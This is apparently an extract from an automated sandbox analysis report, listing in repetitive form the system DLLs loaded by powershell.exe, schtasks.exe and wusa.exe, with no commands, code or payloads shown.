Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
